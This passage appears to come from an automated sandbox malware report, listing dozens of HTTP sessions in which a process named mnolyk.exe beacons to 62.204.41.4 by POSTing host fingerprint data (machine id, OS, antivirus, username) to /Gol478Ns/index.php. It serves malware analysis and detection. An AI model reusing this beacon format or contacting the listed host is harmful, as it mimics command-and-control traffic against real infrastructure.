                                                                      177 | 192.168.2.7 | 49872 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:47.908431053 CET | 292 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:47.973015070 CET | 292 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      178 | 192.168.2.7 | 49873 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:48.143492937 CET | 293 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:48.210887909 CET | 293 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      179 | 192.168.2.7 | 49874 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:48.380254030 CET | 294 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:48.444046974 CET | 294 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      18 | 192.168.2.7 | 49712 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:05.940453053 CET | 122 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:06.005084991 CET | 122 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      180 | 192.168.2.7 | 49875 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:48.616862059 CET | 295 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:48.682903051 CET | 295 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      181 | 192.168.2.7 | 49876 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:48.864984989 CET | 296 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:48.928950071 CET | 296 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      182 | 192.168.2.7 | 49877 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:49.111851931 CET | 297 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:49.175546885 CET | 297 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      183 | 192.168.2.7 | 49878 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:49.349230051 CET | 298 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:49.413600922 CET | 298 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      184 | 192.168.2.7 | 49879 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:49.589027882 CET | 299 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:49.653786898 CET | 299 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      185 | 192.168.2.7 | 49880 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:49.880281925 CET | 300 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:49.943093061 CET | 300 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      186 | 192.168.2.7 | 49881 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:50.123193026 CET | 301 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:50.187123060 CET | 301 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      187 | 192.168.2.7 | 49882 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:50.365010023 CET | 302 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:50.429949045 CET | 302 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      188 | 192.168.2.7 | 49883 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:50.617718935 CET | 303 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:50.682765961 CET | 303 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      189 | 192.168.2.7 | 49884 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:50.864769936 CET | 304 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:50.929433107 CET | 304 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      19 | 192.168.2.7 | 49713 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:06.192940950 CET | 123 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:06.257908106 CET | 123 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      190 | 192.168.2.7 | 49885 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:51.097831964 CET | 305 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:51.160739899 CET | 305 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:51 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      191 | 192.168.2.7 | 49886 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:51.330001116 CET | 306 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:51.391896963 CET | 306 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:51 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      192 | 192.168.2.7 | 49887 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:51.576052904 CET | 307 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:51.638092041 CET | 307 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:51 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      193 | 192.168.2.7 | 49888 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:51.818185091 CET | 308 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:51.879987001 CET | 308 | IN | HTTP/1.1 200 OK
